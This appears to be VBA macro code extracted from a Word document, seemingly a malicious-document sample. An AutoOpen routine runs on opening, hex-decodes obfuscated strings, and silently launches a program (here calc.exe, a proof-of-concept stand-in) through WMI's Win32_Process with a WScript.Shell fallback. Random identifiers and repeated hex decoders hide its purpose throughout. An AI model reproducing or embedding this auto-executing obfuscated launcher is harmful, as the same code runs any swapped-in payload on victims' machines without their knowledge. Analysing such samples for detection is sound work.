Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const jbegtvjtmu = 2
Const tsqhmponly = 1
Const tfebnpcbwr = 0
Sub AutoOpen()
izfhnqstzj ipdcjtrjtqir("63616c632e") & ipdcjtrjtqir("657865")
End Sub
Private Function ipdcjtrjtqir(ByVal rnjnsrilehvv As String) As String
Dim byyzbbdwfrii As Long
For byyzbbdwfrii = 1 To Len(rnjnsrilehvv) Step 2
ipdcjtrjtqir = ipdcjtrjtqir & Chr$(Val("&H" & Mid$(rnjnsrilehvv, byyzbbdwfrii, 2)))
Next byyzbbdwfrii
End Function

Attribute VB_Name = "fxsniytpd"
Const apcikwaabc = 2
Const lybogldeve = 1
Const uhaqhwidiu = 0
Sub izfhnqstzj(fmysitfnhk As String)
On Error Resume Next
Err.Clear
wimResult = egfgtidkuveh(fmysitfnhk)
If Err.Number <> 0 Or wimResult <> 0 Then
Err.Clear
taagdopqffz fmysitfnhk
End If
On Error GoTo 0
End Sub
Private Function ggwauixxobwv(ByVal bxuytmmcppov As String) As String
Dim qxrhlrtefwpp As Long
For qxrhlrtefwpp = 1 To Len(bxuytmmcppov) Step 2
ggwauixxobwv = ggwauixxobwv & Chr$(Val("&H" & Mid$(bxuytmmcppov, qxrhlrtefwpp, 2)))
Next qxrhlrtefwpp
End Function

Attribute VB_Name = "loeivxmvf"
Const xyktokbdso = 2
Const bfeeoqujhw = 1
Const xkporhxkbn = 0
Sub taagdopqffz(targetPath As String)
CreateObject(qxdiiwwydmos("57") & qxdiiwwydmos("5363726970742e5368656c6c")).Run targetPath, 0
End Sub
Private Function qxdiiwwydmos(ByVal mtwidttxsejg As String) As String
Dim ohrpvakcrsri As Long
For ohrpvakcrsri = 1 To Len(mtwidttxsejg) Step 2
qxdiiwwydmos = qxdiiwwydmos & Chr$(Val("&H" & Mid$(mtwidttxsejg, ohrpvakcrsri, 2)))
Next ohrpvakcrsri
End Function

Attribute VB_Name = "zmamjzasf"
Const tbbbcsayho = 2
Const kkqefljfqr = 1
Const vobxnywtdp = 0
Function egfgtidkuveh(targetPath As String) As Integer
Set jcxzbzjemiwjrt = GetObject(uyamkgwkylsa("77696e6d676d74733a5c5c2e5c726f6f745c63696d76") & uyamkgwkylsa("32"))
Set nxvcqcdjukartpnxgc = jcxzbzjemiwjrt.Get(uyamkgwkylsa("57696e33325f50726f63") & uyamkgwkylsa("65737353746172747570"))
Set xgrsqdcebwge = nxvcqcdjukartpnxgc.SpawnInstance_
Set rughecdubvyvojw = GetObject(uyamkgwkylsa("77696e6d676d74733a") & uyamkgwkylsa("5c5c2e5c726f6f745c63696d76323a57696e33325f50726f63657373"))
egfgtidkuveh = rughecdubvyvojw.Create(targetPath, Null, xgrsqdcebwge, intProcessID)
End Function
Private Function uyamkgwkylsa(ByVal kqvsfphtvawx As String) As String
Dim khvauyyxxepy As Long
For khvauyyxxepy = 1 To Len(kqvsfphtvawx) Step 2
uyamkgwkylsa = uyamkgwkylsa & Chr$(Val("&H" & Mid$(kqvsfphtvawx, khvauyyxxepy, 2)))
Next khvauyyxxepy
End Function



INQUEST-PP=macro
